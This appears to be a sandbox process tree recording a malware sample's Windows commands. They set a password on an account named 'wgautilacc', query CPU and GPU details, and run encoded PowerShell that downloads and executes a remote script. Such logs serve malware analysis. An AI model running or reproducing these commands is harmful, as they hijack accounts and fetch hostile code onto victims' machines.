C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc YY6epZcX1⤵PID:1772
-
C:\Windows\system32\net.exenet.exe user wgautilacc YY6epZcX2⤵PID:3968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc YY6epZcX3⤵PID:2720
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2184
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:204
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2288
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:2192
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2144
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1772
-
-
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵PID:1820
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵PID:3692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵PID:3972
-
-